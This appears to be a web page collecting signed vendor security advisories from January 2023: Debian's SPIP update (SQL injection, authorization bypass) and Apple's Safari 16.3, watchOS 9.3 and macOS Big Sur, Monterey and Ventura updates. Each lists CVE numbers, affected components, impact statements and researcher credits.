    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5325-1                   security@debian.orghttps://www.debian.org/security/                       Sebastien DelafondJanuary 24, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : spipIt was discovered that SPIP, a website engine for publishing, wouldallow a malicious user to SQL injection attacks, or bypassauthorization access.For the stable distribution (bullseye), this problem has been fixed inversion 3.2.11-3+deb11u6.We recommend that you upgrade your spip packages.For the detailed security status of spip please refer toits security tracker page at:https://security-tracker.debian.org/tracker/spipFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAmPPpdYACgkQEL6Jg/PVnWT7GQgAgemz9C/cvulSLwEuV38WAaZwy8RFC3CGw3DirFLf2tVeC6KDI+tGs/u4XSY7M45xEr4y1TR3NMfovrnX6iR/JgPU/3ZJsFquq8O5Z9WCeZFe2YCkmuqP9hQvtxXfOoL4c9b1hfgtv4nVcqLyCFFJhfqLiAy8Eb18vzuggjLVYKa1kioa8wAGk/YBB9rvoKNN1bBfow7A7704Gk2bJMfcxIC9P4anHm6u0OZ4HgC0GYpVYZXegfrFICs7fylqgcg6Ub+HH+6e3wEDN1oqnj0IQDy09lFj4kCT5xQjhQM8oMZChExndWdmRRI2iEmUN/gg7RVhdUfNvv8VTy1lo+wd4g==XA3L-----END PGP SIGNATURE-----

Debian Security Advisory 5325-1

Apple Security Advisory 2023-01-23-8 - Safari 16.3 addresses code execution vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-01-23-8 Safari 16.3Safari 16.3 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213600.WebKitAvailable for: macOS Big Sur and macOS MontereyImpact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: The issue was addressed with improved checks.WebKit Bugzilla: 245464CVE-2023-23496: ChengGang Wu, Yan Kang, YuHao Hu, Yue Sun, JimingWang, JiKai Ren and Hang Shu of Institute of Computing Technology,Chinese Academy of SciencesWebKitAvailable for: macOS Big Sur and macOS MontereyImpact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: The issue was addressed with improved memory handling.WebKit Bugzilla: 248268CVE-2023-23518: YeongHyeon Choi (@hyeon101010), Hyeon Park(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIEWebKit Bugzilla: 248268CVE-2023-23517: YeongHyeon Choi (@hyeon101010), Hyeon Park(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIEAdditional recognitionWebKitWe would like to acknowledge Eliya Stein of Confiant for theirassistance.Safari 16.3 may be obtained from the Mac App Store.All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPPImAACgkQ4RjMIDkeNxmOtA/8C2w5NPXlcGH2m1GpCgxiEDQ/SreXYbyKbflivbXDwE1L+XAzTMhRIHF5KjcqvjaoBh4oHN7IfQNq12/YE3+RMDF03J0sTefTT7SeLjN0wKM92jcqFWSGsLNIUrsO3+jP89/2Di4IY3E07mu7iiZzgi8zGUPoMOxqJK8zpfYFXVe5LVyOfI3ETe2RnjH7et/tvW4KgVGyS4+tVHvC6Dts7efEKC10vgc4xdlWH69OHqUYT2eP7bX909MKt8qnl5YW/W155rKWeZrngRP5gbwAWv6+Q5Jh6X/TZYi1S/5HEgBSUdn/8Cto9A2v5FLZJLtYdoO137FqFMxH8ePWGGaL2JOVkeVYRZgkBnqZWMw4CUFgA6zW8i20e/aYk1IaJsQzgrXzYEDjoXIq1MXgO5egY6pQNIyKtutRSpskWhoOFRXjKHLna0W1R+l6YvfIpprHPlOae7koSwJJqQbq/XvD3XECtrf0xGqFiD5ntCNysFcy5hAEoswVpzkz8368C6OU/bwOuryTlrImLDEsgJBozJk6CGhNgFMg81xzCMt7SzOqTR7u50P3VOki9wt38tejRZyWTJiy3Tke/WlxrN0xl6vnBPsfDX7EW8+xC17mFAJlpnxy3f5Z1mdQq6mG51oZtFSgQR1cKUek/fnKpBNiauEk7A+Amm0nfzlpBT+4rKw=YCs8-----END PGP SIGNATURE-----

Apple Security Advisory 2023-01-23-8

Apple Security Advisory 2023-01-23-7 - watchOS 9.3 addresses bypass, code execution, and information leakage vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-01-23-7 watchOS 9.3

watchOS 9.3 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213599.

AppleMobileFileIntegrity  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: This issue was addressed by enabling hardened runtime.  
CVE-2023-23499: Wojciech Regula of SecuRing (wojciechregula.blog)

ImageIO  
Available for: Apple Watch Series 4 and later  
Impact: Processing an image may lead to a denial-of-service  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2023-23519: Yiğit Can YILMAZ (@yilmazcanyigit)

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to leak sensitive kernel state  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23500: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte.  
Ltd. (@starlabs_sg)

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to determine kernel memory layout  
Description: An information disclosure issue was addressed by  
removing the vulnerable code.  
CVE-2023-23502: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte.  
Ltd. (@starlabs_sg)

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23504: Adam Doupé of ASU SEFCOM

Maps  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to bypass Privacy preferences  
Description: A logic issue was addressed with improved state  
management.  
CVE-2023-23503: an anonymous researcher

Safari  
Available for: Apple Watch Series 4 and later  
Impact: Visiting a website may lead to an app denial-of-service  
Description: The issue was addressed with improved handling of  
caches.  
CVE-2023-23512: Adriatik Raci

Screen Time  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access information about a user’s  
contacts  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23505: Wojciech Reguła of SecuRing (wojciechregula.blog)

Weather  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to bypass Privacy preferences  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23511: Wojciech Regula of SecuRing (wojciechregula.blog), an  
anonymous researcher

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 245464  
CVE-2023-23496: ChengGang Wu, Yan Kang, YuHao Hu, Yue Sun, Jiming  
Wang, JiKai Ren and Hang Shu of Institute of Computing Technology,  
Chinese Academy of Sciences

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 248268  
CVE-2023-23518: YeongHyeon Choi (@hyeon101010), Hyeon Park  
(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),  
JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE  
WebKit Bugzilla: 248268  
CVE-2023-23517: YeongHyeon Choi (@hyeon101010), Hyeon Park  
(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),  
JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE

Additional recognition

Kernel  
We would like to acknowledge Nick Stenning of Replicate for their  
assistance.

WebKit  
We would like to acknowledge Eliya Stein of Confiant for their  
assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPPImAACgkQ4RjMIDke  
NxlPXQ//eXfTfjIg6Y/1b0u3+Ht29Qjn7kw6Gh296lh6jlGatQ8zXyk1dGl6MKcp  
ZTc7DFfL1VUN6MovOqW5qcR+MIV6hDiUd54ncDgjCXdHrtTG+bYchX5CJf5IIb67  
gZP/2bBt4PQ+PHm3KqXPp7QauJWYD1d7AHChwqEbYchHxvgedB7Pu6nJvG3bnFmh  
8ny/xrFEhtIDahw4MbicvK847aVpXyH6NxEoRY+8b9/4VocttfUPwMkGZTkVt/tz  
9qfmKgjWpX2mTP9iaLlZdCUV/I4HcjTW0/nkDoaTBVDLW96DSeIo4nMM3qkcygRl  
TPVlvm+3Nenib1b6PZ71B26IJbmGdwR02SEpUPDDXbTGZeWmcyXe7ncvwSIbcGRI  
sPGMq6mEPi+rKTXKZeqPSDFnUlZJna2aNg9fPL9AZ1gwfNSbuhh5ZKQ9AAWA+k51  
4QtoReAKUXinl8vr7BNVQSJSiZLMdgph4nCTYk1RA/VHDPjwaAJehDFUqKKKTuvp  
h59J8OSw0HaWP2NcMEglO4/EXj09E3gfveQ74KtG+eDbBMKa+RArIgOZZaDOk2F1  
6Fs316bNBI9tMxP34gFEvexTTBuQpoR/76pSQajlaSdas5Jeub2QeJVHkBPMdatD  
HBbjpZhu4JcYqDVSDt58Ra5IsaM+OLkhvvCfi+UYxOiyZis3gn8=  
=/vLS  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-01-23-7

Apple Security Advisory 2023-01-23-6 - macOS Big Sur 11.7.3 addresses buffer overflow, bypass, and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-01-23-6 macOS Big Sur 11.7.3

macOS Big Sur 11.7.3 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213603.

AppleMobileFileIntegrity  
Available for: macOS Big Sur  
Impact: An app may be able to access user-sensitive data  
Description: This issue was addressed by enabling hardened runtime.  
CVE-2023-23499: Wojciech Reguła (@_r3ggi) of SecuRing  
(wojciechregula.blog)

curl  
Available for: macOS Big Sur  
Impact: Multiple issues in curl  
Description: Multiple issues were addressed by updating to curl  
version 7.85.0.  
CVE-2022-35252

dcerpc  
Available for: macOS Big Sur  
Impact: Mounting a maliciously crafted Samba network share may lead  
to arbitrary code execution  
Description: A buffer overflow issue was addressed with improved  
memory handling.  
CVE-2023-23513: Dimitrios Tatsis and Aleksandar Nikolic of Cisco  
Talos

PackageKit  
Available for: macOS Big Sur  
Impact: An app may be able to gain root privileges  
Description: A logic issue was addressed with improved state  
management.  
CVE-2023-23497: Mickey Jin (@patch1t)

Screen Time  
Available for: macOS Big Sur  
Impact: An app may be able to access information about a user’s  
contacts  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23505: Wojciech Reguła of SecuRing (wojciechregula.blog)

WebKit  
Available for: macOS Big Sur  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 248268  
CVE-2023-23518: YeongHyeon Choi (@hyeon101010), Hyeon Park  
(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),  
JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE  
WebKit Bugzilla: 248268  
CVE-2023-23517: YeongHyeon Choi (@hyeon101010), Hyeon Park  
(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),  
JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE

Windows Installer  
Available for: macOS Big Sur  
Impact: An app may be able to bypass Privacy preferences  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23508: Mickey Jin (@patch1t)

macOS Big Sur 11.7.3 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPPIl8ACgkQ4RjMIDke  
NxmcTxAA5RgSSuSbRaEzLzDYMXICkEWJLRFDxirCePXlty57qxD+Edl/f7rZhvxx  
nt5f0TTSVV2D4j+bb1MC/qFgINJ2SV31UY3nQXg+k85QeCyjEMXQDgIk5QBJd40E  
gcPXFOQULvHJAhyKAvNexGqyRTUk4GqifPZNwXFxKC/tsPahr/Bh6OP+l7CkhG7Y  
XiDuKLpL7ssAMl6sf7Lg5H114P/6pPwKM949mYzUz+0CH6uXQ7oWSx/KirbR3HD8  
W3FQY/iS3hzG6EALUbFWKjxXPHRv/59TQElizLVqfxLQCjSokxyDiW5OehMeefQs  
8dFDCMbpbQFC0RBVFVCS3fzhCNu24LfihyUmz9//Azguv3HJhbuZ/kz70JhsLW9F  
6mGlbXA/w2rAWXpJ2fRsHSqpZw9jiX1FlfUH+h3T8cmtnfZDduV0AEvCIK8Zp/nq  
S6+sZ3i5VtQyUGZc3FKTQVTeMPrXhyLCXlfiCXMfo04P11AJNxOqSHgBH43N8pNp  
drRKydDb+u8QpxUzuaxbyn2dgoEaxwRke6jspkPFPZ/ipj8eNLIn2FqQx8CGXCDL  
2k/+/a4M/zsGcr39kuGjcXNba6YbXnA8HwWqmKeMwQ+3VTMwf6C2x0h6OBQGIGcv  
MyrKHkVVE9KyPk9AULiw4BJYX7MMBmSbpf2OEDP3d06d6e1ljv8=  
=hYz5  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-01-23-6

Apple Security Advisory 2023-01-23-5 - macOS Monterey 12.6.3 addresses buffer overflow, bypass, code execution, and information leakage vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-01-23-5 macOS Monterey 12.6.3

macOS Monterey 12.6.3 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213604.

AppleMobileFileIntegrity  
Available for: macOS Monterey  
Impact: An app may be able to access user-sensitive data  
Description: This issue was addressed by enabling hardened runtime.  
CVE-2023-23499: Wojciech Reguła (@_r3ggi) of SecuRing  
(wojciechregula.blog)

curl  
Available for: macOS Monterey  
Impact: Multiple issues in curl  
Description: Multiple issues were addressed by updating to curl  
version 7.86.0.  
CVE-2022-42915  
CVE-2022-42916  
CVE-2022-32221  
CVE-2022-35260

curl  
Available for: macOS Monterey  
Impact: Multiple issues in curl  
Description: Multiple issues were addressed by updating to curl  
version 7.85.0.  
CVE-2022-35252

dcerpc  
Available for: macOS Monterey  
Impact: Mounting a maliciously crafted Samba network share may lead  
to arbitrary code execution  
Description: A buffer overflow issue was addressed with improved  
memory handling.  
CVE-2023-23513: Dimitrios Tatsis and Aleksandar Nikolic of Cisco  
Talos

DiskArbitration  
Available for: macOS Monterey  
Impact: An encrypted volume may be unmounted and remounted by a  
different user without prompting for the password  
Description: A logic issue was addressed with improved state  
management.  
CVE-2023-23493: Oliver Norpoth (@norpoth) of KLIXX GmbH (klixx.com)

DriverKit  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A type confusion issue was addressed with improved  
checks.  
CVE-2022-32915: Tommy Muir (@Muirey03)

Intel Graphics Driver  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved bounds checks.  
CVE-2023-23507: an anonymous researcher

Kernel  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23504: Adam Doupé of ASU SEFCOM

Kernel  
Available for: macOS Monterey  
Impact: An app may be able to determine kernel memory layout  
Description: An information disclosure issue was addressed by  
removing the vulnerable code.  
CVE-2023-23502: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte.  
Ltd. (@starlabs_sg)

PackageKit  
Available for: macOS Monterey  
Impact: An app may be able to gain root privileges  
Description: A logic issue was addressed with improved state  
management.  
CVE-2023-23497: Mickey Jin (@patch1t)

Screen Time  
Available for: macOS Monterey  
Impact: An app may be able to access information about a user’s  
contacts  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23505: Wojciech Regula of SecuRing (wojciechregula.blog)

Weather  
Available for: macOS Monterey  
Impact: An app may be able to bypass Privacy preferences  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23511: Wojciech Regula of SecuRing (wojciechregula.blog), an  
anonymous researcher

WebKit  
Available for: macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 248268  
CVE-2023-23518: YeongHyeon Choi (@hyeon101010), Hyeon Park  
(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),  
JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE  
WebKit Bugzilla: 248268  
CVE-2023-23517: YeongHyeon Choi (@hyeon101010), Hyeon Park  
(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),  
JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE

Windows Installer  
Available for: macOS Monterey  
Impact: An app may be able to bypass Privacy preferences  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23508: Mickey Jin (@patch1t)

Additional recognition

Kernel  
We would like to acknowledge Nick Stenning of Replicate for their  
assistance.

macOS Monterey 12.6.3 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPPIl8ACgkQ4RjMIDke  
NxlXeg/+JwvCu4zHuDTptxkKw1gxht0hTTVJvNjgNWj2XFtnOz9kCIupGj/xPTMl  
P9vABQWRbpEJfCJE31FbUcxRCMcr/jm8dDb1ocx4qsGLlY5iGLQ/M1G6OLxQVajg  
gGaCSMjW9Zk7l7sXztKj4XcirsB3ft9tiRJwgPUE0znaT70970usFdg+q95CzODm  
DHVoa5VNLi0zA4178CIiq4WayAZe90cRYYQQ1+Okjhab/U/blfGgEPhA/rrdjQ85  
J4NKTXyGBIWl+Ix4HpLikYpnwm/TKyYiY+MogZ6xUmFwnUgXkPCc4gYdPANQk064  
KNjy90yq3Os9IBjfDpw+Pqs6I3GMZ0oNYUKWO+45/0NVp5/qjDFt5K7ZS+Xz5Py7  
YrodbwaYiESzsdfLja9ILf8X7taDLHxxfHEvWcXnhcMD1XNKU6mpsb8SOLicWYzp  
8maZarjhzQl3dQi4Kz3vQk0hKHTIE6/04fRdDpqhM9WXljayLLO7bsryW8u98Y/b  
fR3BXgfsll+QjdLDeW3nfuY+q2JsW0a2lhJZnxuRQPC+wUGDoCY7vcCbv8zkx0oo  
y1w8VDBdUjj7vyVSAqoZNlpgl1ebKgciVhTvrgTsyVxuOA94VzDCeI5/6RkjDAJ+  
WL2Em8qc4aqXvGEwimKdNkETbyqIRcNVXWhXLVGLsmHvDViVjGQ=  
=BbMS  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-01-23-5

Apple Security Advisory 2023-01-23-4 - macOS Ventura 13.2 addresses buffer overflow, bypass, code execution, information leakage, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-01-23-4 macOS Ventura 13.2

macOS Ventura 13.2 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213605.

AppleMobileFileIntegrity  
Available for: macOS Ventura  
Impact: An app may be able to access user-sensitive data  
Description: This issue was addressed by enabling hardened runtime.  
CVE-2023-23499: Wojciech Reguła (@_r3ggi) of SecuRing  
(wojciechregula.blog)

curl  
Available for: macOS Ventura  
Impact: Multiple issues in curl  
Description: Multiple issues were addressed by updating to curl  
version 7.86.0.  
CVE-2022-42915  
CVE-2022-42916  
CVE-2022-32221  
CVE-2022-35260

dcerpc  
Available for: macOS Ventura  
Impact: Mounting a maliciously crafted Samba network share may lead  
to arbitrary code execution  
Description: A buffer overflow issue was addressed with improved  
memory handling.  
CVE-2023-23513: Dimitrios Tatsis and Aleksandar Nikolic of Cisco  
Talos

DiskArbitration  
Available for: macOS Ventura  
Impact: An encrypted volume may be unmounted and remounted by a  
different user without prompting for the password  
Description: A logic issue was addressed with improved state  
management.  
CVE-2023-23493: Oliver Norpoth (@norpoth) of KLIXX GmbH (klixx.com)

ImageIO  
Available for: macOS Ventura  
Impact: Processing an image may lead to a denial-of-service  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2023-23519: Yiğit Can YILMAZ (@yilmazcanyigit)

Intel Graphics Driver  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved bounds checks.  
CVE-2023-23507: an anonymous researcher

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to leak sensitive kernel state  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23500: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte.  
Ltd. (@starlabs_sg)

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to determine kernel memory layout  
Description: An information disclosure issue was addressed by  
removing the vulnerable code.  
CVE-2023-23502: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte.  
Ltd. (@starlabs_sg)

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23504: Adam Doupé of ASU SEFCOM

libxpc  
Available for: macOS Ventura  
Impact: An app may be able to access user-sensitive data  
Description: A permissions issue was addressed with improved  
validation.  
CVE-2023-23506: Guilherme Rambo of Best Buddy Apps (rambo.codes)

Mail Drafts  
Available for: macOS Ventura  
Impact: The quoted original message may be selected from the wrong  
email when forwarding an email from an Exchange account  
Description: A logic issue was addressed with improved state  
management.  
CVE-2023-23498: an anonymous researcher

Maps  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: A logic issue was addressed with improved state  
management.  
CVE-2023-23503: an anonymous researcher

PackageKit  
Available for: macOS Ventura  
Impact: An app may be able to gain root privileges  
Description: A logic issue was addressed with improved state  
management.  
CVE-2023-23497: Mickey Jin (@patch1t)

Safari  
Available for: macOS Ventura  
Impact: An app may be able to access a user’s Safari history  
Description: A permissions issue was addressed with improved  
validation.  
CVE-2023-23510: Guilherme Rambo of Best Buddy Apps (rambo.codes)

Safari  
Available for: macOS Ventura  
Impact: Visiting a website may lead to an app denial-of-service  
Description: The issue was addressed with improved handling of  
caches.  
CVE-2023-23512: Adriatik Raci

Screen Time  
Available for: macOS Ventura  
Impact: An app may be able to access information about a user’s  
contacts  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23505: Wojciech Reguła of SecuRing (wojciechregula.blog)

Vim  
Available for: macOS Ventura  
Impact: Multiple issues in Vim  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-3705

Weather  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23511: Wojciech Regula of SecuRing (wojciechregula.blog), an  
anonymous researcher

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 245464  
CVE-2023-23496: ChengGang Wu, Yan Kang, YuHao Hu, Yue Sun, Jiming  
Wang, JiKai Ren and Hang Shu of Institute of Computing Technology,  
Chinese Academy of Sciences

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 248268  
CVE-2023-23518: YeongHyeon Choi (@hyeon101010), Hyeon Park  
(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),  
JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE  
WebKit Bugzilla: 248268  
CVE-2023-23517: YeongHyeon Choi (@hyeon101010), Hyeon Park  
(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),  
JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE

Wi-Fi  
Available for: macOS Ventura  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23501: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte.  
Ltd. (@starlabs_sg)

Windows Installer  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23508: Mickey Jin (@patch1t)

Additional recognition

Bluetooth  
We would like to acknowledge an anonymous researcher for their  
assistance.

Kernel  
We would like to acknowledge Nick Stenning of Replicate for their  
assistance.

Shortcuts  
We would like to acknowledge Baibhav Anand Jha from ReconWithMe and  
Cristian Dinca of Tudor Vianu National High School of Computer  
Science, Romania for their assistance.

WebKit  
We would like to acknowledge Eliya Stein of Confiant for their  
assistance.

macOS Ventura 13.2 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPPIl8ACgkQ4RjMIDke  
Nxnt7RAA2a0c/Ij93MfR8eiNMkIHVnr+wL+4rckVmHvs85dSHNBqQ8+kYpAs2tEk  
7CVZoxAGg8LqVa6ZmBbAp5ZJGi2nV8LjOYzaWw/66d648QC2upTWJ93sWmZ7LlLb  
m9pcLfBsdAFPmVa8VJO0fxJGkxsCP0cQiBl+f9R4ObZBBiScbHUckSmHa6Qn/Q2U  
VsnHnJznAlDHMXiaV3O1zKBeahkqSx/IfO04qmk8oMWh89hI53S551Z3NEx63zgd  
Cx8JENj2NpFlgmZ0w0Tz5ZZ3LT4Ok28ns8N762JLE2nbTfEl7rM+bjUfWg4yJ1Rp  
TCEelbLKfUjlrh2N1fe0XWBs9br/069QlhTBBVd/qAbUBxkS/UOlWk3Vp+TI0bkK  
rrXouRijzRmBBK93jfWxhyd27avqQHmc04ofjY/lNYOCcGMrr813cGKNs90aRfcg  
joKeC51mYJnlTyMB0nDcJx3b5+MN+Ij7Sa04B9dbH162YFxp4LsaavmR0MooN1T9  
3XrXEQ71a3pvdoF1ffW9Mz7vaqhBkffnzQwWU5zY2RwDTjFyHdNyI/1JkVzYmAxq  
QR4uA5gCDYYk/3rzlrVot+ezHX525clTHsvEYhIfu+i1HCxqdpvfaHbn2m+i1QtU  
/Lzz2mySt3y0akZ2rHwPfBZ8UFfvaauyhZ3EhSP3ikGs9DOsv1w=  
=pcJ4  
-----END PGP SIGNATURE-----

Tag

#js